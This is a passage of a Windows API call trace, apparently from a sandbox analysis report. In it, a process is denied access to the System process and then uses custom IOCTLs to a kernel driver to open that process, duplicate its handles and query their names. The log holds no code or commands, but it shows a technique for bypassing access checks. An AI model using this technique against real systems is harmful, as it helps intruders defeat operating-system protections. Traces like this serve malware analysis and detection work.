ClientId=0xffffd000ac0cf428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000ac0cf420*=0xffffffff80000d78) returned 0x0 [0288.555] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000d78, SourceHandle=0xa54, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe00069994900, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe00069994900*=0x18c) returned 0x0 [0288.555] ZwClose (Handle=0xffffffff80000d78) returned 0x0 [0288.555] IoCompleteRequest () returned 0x0 [0288.555] CloseHandle (hObject=0x188) returned 1 [0288.555] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.555] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.555] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.555] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.555] PsAcquireProcessExitSynchronization () returned 0x0 [0288.555] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.555] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a73d3f0, HandleInformation=0x0) returned 0x0 [0288.555] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.555] PsReleaseProcessExitSynchronization () returned 0x2 [0288.555] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8fc [0288.555] ObQueryNameString (in: Object=0xffffe0006a73d3f0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.555] ObfDereferenceObject (Object=0xffffe0006a73d3f0) returned 0xfffe [0288.555] IoCompleteRequest () returned 0x0 [0288.555] CloseHandle (hObject=0x18c) returned 1 [0288.555] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0288.555] GetLastError () returned 0x5 [0288.555] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0288.555] ZwOpenProcess (in: ProcessHandle=0xffffe00069994900, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000ac0cf4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe00069994900*=0x18c) returned 0x0 [0288.555] IoCompleteRequest () returned 0x0 [0288.555] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0288.555] ZwOpenProcess (in: ProcessHandle=0xffffd000ac0cf420, DesiredAccess=0x40, ObjectAttributes=0xffffd000ac0cf438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000ac0cf420*=0xffffffff80000d78) returned 0x0 [0288.556] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000d78, SourceHandle=0x59c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe00069994900, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe00069994900*=0x188) returned 0x0 [0288.556] ZwClose (Handle=0xffffffff80000d78) returned 0x0 [0288.556] IoCompleteRequest () returned 0x0 [0288.556] CloseHandle (hObject=0x18c) returned 1 [0288.556] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.556] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x98, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.556] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x28, lpOverlapped=0x0) returned 1 [0288.556] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.556] PsAcquireProcessExitSynchronization () returned 0x0 [0288.556] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.556] ObReferenceObjectByHandle (in: Handle=0xffffffff8000059c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069715890, HandleInformation=0x0) returned 0x0 [0288.556] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.556] PsReleaseProcessExitSynchronization () returned 0x2 [0288.556] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8f8 [0288.556] ObQueryNameString (in: Object=0xffffe00069715890, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.556] ObfDereferenceObject (Object=0xffffe00069715890) returned 0xffff [0288.556] IoCompleteRequest () returned 0x0 [0288.556] CloseHandle (hObject=0x188) returned 1 [0288.556] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0288.556] GetLastError () returned 0x5 [0288.556] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0288.556] ZwOpenProcess (in: ProcessHandle=0xffffe00069994900, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000ac0cf4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe00069994900*=0x188) returned 0x0 [0288.556] IoCompleteRequest () returned 0x0 [0288.556] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0288.556] ZwOpenProcess (in: ProcessHandle=0xffffd000ac0cf420, DesiredAccess=0x40, ObjectAttributes=0xffffd000ac0cf438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000ac0cf420*=0xffffffff80000d78) returned 0x0 [0288.556] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000d78, SourceHandle=0xa0, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe00069994900, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe00069994900*=0x18c) returned 0x0 [0288.556] ZwClose (Handle=0xffffffff80000d78) returned 0x0 [0288.556] IoCompleteRequest () returned 0x0 [0288.556] CloseHandle (hObject=0x188) returned 1 [0288.556] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.556] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.556] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.557] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.557] PsAcquireProcessExitSynchronization () returned 0x0 [0288.557] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.557] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000692a47b0, HandleInformation=0x0) returned 0x0 [0288.557] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.557] PsReleaseProcessExitSynchronization () returned 0x2 [0288.557] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8f4 [0288.557] ObQueryNameString (in: Object=0xffffe000692a47b0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.557] ObfDereferenceObject (Object=0xffffe000692a47b0) returned 0xfffe [0288.557] IoCompleteRequest () returned 0x0 [0288.557] CloseHandle (hObject=0x18c) returned 1 [0288.557] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0288.557] GetLastError () returned 0x5 [0288.557] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0288.557] ZwOpenProcess (in: ProcessHandle=0xffffe00069994900, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000ac0cf4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe00069994900*=0x18c) returned 0x0 [0288.557] IoCompleteRequest () returned 0x0 [0288.557] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0288.557] ZwOpenProcess (in: ProcessHandle=0xffffd000ac0cf420, DesiredAccess=0x40, ObjectAttributes=0xffffd000ac0cf438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000ac0cf420*=0xffffffff80000d78) returned 0x0 [0288.557] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000d78, SourceHandle=0x14, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe00069994900, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe00069994900*=0x188) returned 0x0 [0288.557] ZwClose (Handle=0xffffffff80000d78) returned 0x0 [0288.557] IoCompleteRequest () returned 0x0 [0288.557] CloseHandle (hObject=0x18c) returned 1 [0288.557] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.557] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.557] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x48, lpOverlapped=0x0) returned 1 [0288.557] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.557] PsAcquireProcessExitSynchronization () returned 0x0 [0288.557] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.557] ObReferenceObjectByHandle (in: Handle=0xffffffff80000014, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e9dc90, HandleInformation=0x0) returned 0x0 [0288.557] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.557] PsReleaseProcessExitSynchronization () returned 0x2 [0288.557] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8f0 [0288.557] ObQueryNameString (in: Object=0xffffe00067e9dc90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.557] ObfDereferenceObject (Object=0xffffe00067e9dc90) returned 0xffff [0288.557] IoCompleteRequest () returned 0x0 [0288.557] CloseHandle (hObject=0x188) returned 1 [0288.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0288.558] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.558] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.558] PsAcquireProcessExitSynchronization () returned 0x0 [0288.558] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.558] ObReferenceObjectByHandle (in: Handle=0xffffffff8000007c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006f47b270, HandleInformation=0x0) returned 0x0 [0288.558] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.558] PsReleaseProcessExitSynchronization () returned 0x2 [0288.558] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ee [0288.558] ObQueryNameString (in: Object=0xffffe0006f47b270, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.558] ObfDereferenceObject (Object=0xffffe0006f47b270) returned 0x7ffe [0288.558] IoCompleteRequest () returned 0x0 [0288.558] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0288.558] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.558] PsAcquireProcessExitSynchronization () returned 0x0 [0288.558] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.558] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000695446f0, HandleInformation=0x0) returned 0x0 [0288.558] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.558] PsReleaseProcessExitSynchronization () returned 0x2 [0288.558] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ed [0288.558] ObQueryNameString (in: Object=0xffffe000695446f0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.558] ObfDereferenceObject (Object=0xffffe000695446f0) returned 0x7ff9 [0288.558] IoCompleteRequest () returned 0x0 [0288.558] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.606] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.606] PsAcquireProcessExitSynchronization () returned 0x0 [0288.606] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.606] ObReferenceObjectByHandle (in: Handle=0xffffffff800000bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007efa6de0, HandleInformation=0x0) returned 0x0 [0288.606] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.606] PsReleaseProcessExitSynchronization () returned 0x2 [0288.606] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ec [0288.606] ObQueryNameString (in: Object=0xffffe0007efa6de0, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.606] ObfDereferenceObject (Object=0xffffe0007efa6de0) returned 0x7fff [0288.606] IoCompleteRequest () returned 0x0 [0288.606] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.606] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.606] PsAcquireProcessExitSynchronization () returned 0x0 [0288.606] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.606] ObReferenceObjectByHandle (in: Handle=0xffffffff800000c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007f3ff490, HandleInformation=0x0) returned 0x0 [0288.606] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.607] PsReleaseProcessExitSynchronization () returned 0x2 [0288.607] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8eb [0288.607] ObQueryNameString (in: Object=0xffffe0007f3ff490, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.607] ObfDereferenceObject (Object=0xffffe0007f3ff490) returned 0x7fff [0288.607] IoCompleteRequest () returned 0x0 [0288.607] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.607] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.607] PsAcquireProcessExitSynchronization () returned 0x0 [0288.607] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.607] ObReferenceObjectByHandle (in: Handle=0xffffffff800000c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007f3ff820, HandleInformation=0x0) returned 0x0 [0288.607] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.607] PsReleaseProcessExitSynchronization () returned 0x2 [0288.607] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ea [0288.607] ObQueryNameString (in: Object=0xffffe0007f3ff820, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.607] ObfDereferenceObject (Object=0xffffe0007f3ff820) returned 0x7ffe [0288.607] IoCompleteRequest () returned 0x0 [0288.607] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x6a, lpOverlapped=0x0) returned 1 [0288.607] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.607] PsAcquireProcessExitSynchronization () returned 0x0 [0288.607] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.607] ObReferenceObjectByHandle (in: Handle=0xffffffff800000c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007f7fc920, HandleInformation=0x0) returned 0x0 [0288.607] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.607] PsReleaseProcessExitSynchronization () returned 0x2 [0288.607] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e9 [0288.607] ObQueryNameString (in: Object=0xffffe0007f7fc920, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.607] ObfDereferenceObject (Object=0xffffe0007f7fc920) returned 0x7fff [0288.607] IoCompleteRequest () returned 0x0 [0288.607] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.607] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.607] PsAcquireProcessExitSynchronization () returned 0x0 [0288.607] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.607] ObReferenceObjectByHandle (in: Handle=0xffffffff800000cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000805ff650, HandleInformation=0x0) returned 0x0 [0288.607] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.607] PsReleaseProcessExitSynchronization () returned 0x2 [0288.607] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e8 [0288.607] ObQueryNameString (in: Object=0xffffe000805ff650, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.607] ObfDereferenceObject (Object=0xffffe000805ff650) returned 0x7fff [0288.607] IoCompleteRequest () returned 0x0 [0288.607] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.608] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.608] PsAcquireProcessExitSynchronization () returned 0x0 [0288.608] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.608] ObReferenceObjectByHandle (in: Handle=0xffffffff800000d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00080dbc360, HandleInformation=0x0) returned 0x0 [0288.608] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.608] PsReleaseProcessExitSynchronization () returned 0x2 [0288.608] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e7 [0288.608] ObQueryNameString (in: Object=0xffffe00080dbc360, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, 